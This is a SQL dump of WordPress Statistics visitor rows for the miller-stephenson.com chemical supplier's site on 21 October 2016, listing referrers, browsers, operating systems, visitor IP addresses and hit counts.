INSERT INTO `wp_statistics_visitor` VALUES (9444, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '213.55.115.245', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9445, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '78.136.242.82', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9446, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '203.81.70.202', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9447, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '186.14.188.225', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9448, '2016-10-21', 'https://www.miller-stephenson.com/product/epikure-w/', 'Chrome', 'Windows', '53.0.2785.143', '', '128.174.133.145', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9449, '2016-10-21', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '210.4.118.106', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9450, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.97.149.108', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9451, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '5.156.4.66', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9452, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '27.32.225.220', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9453, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.167.253.72', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9454, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '45.120.56.204', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9455, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '85.203.36.48', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9456, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '87.209.143.202', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9457, '2016-10-21', 'https://www.mosrif.ru/', 'MSIE', 'Windows', '6.0', '', '134.249.65.218', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9458, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '192.168.1.47', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9459, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '122.169.197.202', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9460, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '78.139.214.44', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9461, '2016-10-21', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '95.110.194.252', '000', 101, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9462, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '90.218.28.41', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9463, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '171.96.176.99', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9464, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.46.166.105', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9465, '2016-10-21', 'https://www.google.com.au/', 'Chrome', 'Windows', '53.0.2785.143', '', '49.177.21.74', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9466, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '194.190.171.24', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9467, '2016-10-21', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '6.0', '', '45.76.196.135', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9468, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.124.160.185', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9469, '2016-10-21', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '92.48.105.158', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9470, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.234.121.226', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9471, '2016-10-21', 'https://www.google.de/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwjGkuLwiOvPAhUqGZoKHVu8AxEQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.136499718,d.bGs', 'MSIE', 'Windows', '11.0', '', '62.157.202.73', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9472, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.141.196.216', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9473, '2016-10-21', 'https://www.bing.com/search?&q=+32%20chemical%20manufacturing%20companies%20email%20contact%20mail&scope=web&setmkt=pt-PT&setlang=match&first=311', 'MSIE', 'Windows', '11.0', '', '196.53.52.95', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9474, '2016-10-21', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '185.33.54.9', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9475, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '89.78.192.193', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9476, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.163.128.26', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9477, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '39.0.2171.99', '', '66.249.79.157', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9478, '2016-10-21', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '178.21.73.83', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9479, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '39.0.2171.99', '', '66.249.79.153', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9480, '2016-10-21', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '9.0', '', '202.102.99.28', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9481, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '81.162.77.182', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9482, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '77.40.117.232', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9483, '2016-10-21', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '47.16.126.153', '000', 19, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9484, '2016-10-21', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '184.168.200.96', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9485, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '89.248.112.19', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9486, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2224.3', '', '192.126.178.36', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9487, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '176.128.214.62', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9488, '2016-10-21', 'https://www.google.com.ph/', 'Chrome', 'Windows', '53.0.2785.143', '', '210.5.105.195', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9489, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '82.208.124.197', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9490, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '83.219.136.243', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9491, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '73.180.142.116', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9492, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '112.198.243.170', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9493, '2016-10-21', 'https://www.miller-stephenson.com', 'Mechanize', 'Unknown', '2.7.3', '', '198.23.252.121', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9494, '2016-10-21', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '48.0.2564.109', '', '146.185.223.4', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9495, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '89.169.203.67', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9496, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '112.196.181.162', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9497, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.144.142.188', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9498, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.90', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9499, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.122', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9500, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '46.16.111.78', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9501, '2016-10-21', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '66.11.128.152', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9502, '2016-10-21', 'https://www.miller-stephenson.com/index.html', 'Chrome', 'Windows', '45.0.2454.101', '', '101.226.66.181', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9503, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '192.168.88.15', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9504, '2016-10-21', 'https://astana.xkaz.org/', 'Opera', 'Windows', '9.00', '', '178.137.167.230', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9505, '2016-10-21', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '101.226.99.197', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9506, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.60.136.250', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9507, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.227.105.119', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9508, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '213.87.150.29', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9509, '2016-10-21', 'https://www.google.ca/url?sa=t&rct=j&q=&esrc=s&source=web&cd=11&ved=0ahUKEwiYiLHonuvPAhVorFQKHSXnC4g4ChAWCCIwAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Frelease-agents%2Fptfe-release-agents%2F&usg=AFQjCNGrFfyGAjv4CCQ6KfwYmzen3_5wnQ', 'MSIE', 'Windows', '11.0', '', '112.168.157.195', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9510, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '14.36.156.26', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9511, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '14.36.156.26', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9512, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '1.237.13.179', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9513, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '62.78.87.145', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9514, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.187.0.112', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9515, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '212.164.238.186', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9516, '2016-10-21', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiK-riaouvPAhWFiX4KHeK3BjYYABAA&sig=AOD64_1bTv0vfJMRtOg30Vc0xicZ4JGdBg&rct=j&q=&ved=0ahUKEwjavLaaouvPAhUoiFQKHeimAe4Q0QwIigE&adurl=', 'MSIE', 'Windows', '11.0', '', '67.61.125.215', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9517, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '61.50.181.21', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9518, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '77.45.226.48', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9519, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '35.161.49.147', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9520, '2016-10-21', 'https://www.so.com/link?url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&q=miller+stephenson+chemical&ts=1477032530&t=80302eda5c7bfa3722177665c3fa290&src=haosou', 'Chrome', 'Windows', '50.0.2661.102', '', '119.114.85.90', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9521, '2016-10-21', 'https://www.so.com/link?url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&q=miller+stephenson+chemical&ts=1477032530&t=80302eda5c7bfa3722177665c3fa290&src=haosou', 'MSIE', 'Windows', '8.0', '', '119.114.85.90', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9522, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '105.225.134.156', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9523, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '62.182.205.245', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9524, '2016-10-21', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '175.167.130.32', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9525, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '2.50.224.204', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9526, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '197.15.199.55', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9527, '2016-10-21', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '65.208.151.114', '000', 27, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9528, '2016-10-21', 'https://balkanfarma.ru/', 'MSIE', 'Windows', '6.0', '', '46.118.155.22', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9529, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '213.165.178.163', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9530, '2016-10-21', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '6.0', '', '65.208.151.119', '000', 23, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9531, '2016-10-21', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '6.0', '', '65.208.151.118', '000', 25, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9532, '2016-10-21', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '6.0', '', '65.208.151.116', '000', 23, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9533, '2016-10-21', 'https://www.google.co.in/', 'Chrome', 'Windows', '41.0.2272.118', '', '182.68.106.133', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9534, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.235.130.240', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9535, '2016-10-21', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '6.0', '', '65.208.151.112', '000', 28, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9536, '2016-10-21', 'https://www.miller-stephenson.com', 'VB', 'Unknown', 'Unknown', '', '115.119.113.194', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9537, '2016-10-21', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '6.0', '', '65.208.151.113', '000', 21, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9538, '2016-10-21', 'https://www.miller-stephenson.com/wp-content/themes/flatsome/inc/extensions/flatsome-live-search/flatsome-live-search.js?ver=3.0', 'MSIE', 'Windows', '6.0', '', '65.208.151.117', '000', 17, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9539, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '19.0', '', '209.128.119.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9540, '2016-10-21', 'https://mschem.com/miller/pdf/Resins%20Epirez.pdf', 'Chrome', 'Macintosh', '53.0.2785.143', '', '203.187.238.168', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9541, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '78.191.233.20', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9542, '2016-10-21', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '6.0', '', '65.208.151.115', '000', 22, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9543, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '79.107.152.103', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9544, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.55.22.163', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9545, '2016-10-21', 'https://www.google.com/', 'Safari', 'iPhone', '9.0', '', '107.77.90.128', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9546, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.219.48.39', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9547, '2016-10-21', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '124.176.54.184', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9548, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.252.24.149', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9549, '2016-10-21', 'https://www.google.de/', 'Firefox', 'Windows', '49.0', '', '134.94.132.128', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9550, '2016-10-21', 'https://www.google.fr/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjb-4a9tevPAhUCXhoKHbRdAJEQFggeMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fepikure-w%2F&usg=AFQjCNHEXqhjk-N_pRnZi-f1vbzhvmYcwA&sig2=grUeKkEKzOQtzqchlf8ikA', 'Firefox', 'Windows', '23.0', '', '77.201.19.106', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9551, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.39', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9552, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.25', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9553, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '106.51.19.69', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9554, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '192.168.1.189', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9555, '2016-10-21', 'https://www.google.com.tw/', 'Firefox', 'Macintosh', '49.0', '', '140.113.20.81', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9556, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '176.212.112.85', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9557, '2016-10-21', 'https://www.google.co.in/', 'Firefox', 'Windows', '49.0', '', '192.168.4.91', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9558, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '88.215.183.213', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9559, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '24.98.210.36', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9560, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '80.253.22.170', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9561, '2016-10-21', 'https://www.google.co.in/', 'Firefox', 'Windows', '49.0', '', '121.243.44.34', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9562, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '156.212.34.39', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9563, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.144.183.206', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9564, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '31.173.101.152', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9565, '2016-10-21', 'https://www.miller-stephenson.com', 'curl', 'Linux', '7.15.5', '', '174.142.61.213', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9566, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.35.151.103', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9567, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '154.66.107.68', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9568, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '79.143.73.250', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9569, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '88.159.34.87', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9570, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.29.111.100', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9571, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '121.160.105.78', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9572, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.75.142.222', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9573, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '182.186.93.181', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9574, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '192.168.78.101', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9575, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '80.110.101.121', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9576, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '82.142.162.162', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9577, '2016-10-21', 'https://shinikiev.com.ua/', 'MSIE', 'Windows', '6.0', '', '46.211.197.241', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9578, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '19.0.1041.0', '', '202.62.16.189', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9579, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.26.234.54', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9580, '2016-10-21', 'https://www.google.gr/', 'Chrome', 'Windows', '53.0.2785.143', '', '2.86.1.80', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9581, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.188.127.9', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9582, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.35.189.66', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9583, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '151.36.62.235', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9584, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '30.0.1599.69', '', '121.189.37.115', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9585, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '117.200.147.132', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9586, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '44.0.2403.133', '', '67.42.222.14', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9587, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '118.103.139.165', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9588, '2016-10-21', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '205.243.112.225', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9589, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.85', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9590, '2016-10-21', 'https://www.google.de/', 'Edge', 'Windows', '14.14393', '', '85.197.58.160', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9591, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.200.78.49', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9592, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.46.154.247', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9593, '2016-10-21', 'https://www.google.ca/', 'Chrome', 'Windows', '44.0.2403.125', '', '142.176.36.18', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9594, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '83.10.53.120', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9595, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '176.194.49.132', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9596, '2016-10-21', 'https://www.google.com.py/', 'Chrome', 'Windows', '53.0.2785.143', '', '181.120.12.88', '000', 2, 0); 
